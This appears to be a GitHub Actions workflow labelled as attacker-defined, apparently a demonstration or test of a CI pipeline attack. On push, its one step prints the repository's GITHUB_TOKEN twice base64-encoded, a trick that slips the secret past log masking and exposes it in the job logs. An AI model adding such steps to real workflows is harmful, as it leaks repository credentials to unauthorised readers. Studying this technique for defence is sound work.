name: attacker defined2

on: push

jobs:
  hello-from-attacker:
    runs-on: ubuntu-latest
    steps:
      - name: hello
        run: |
          echo "hewo"
          echo "${{secrets.GITHUB_TOKEN}}" | base64 | base64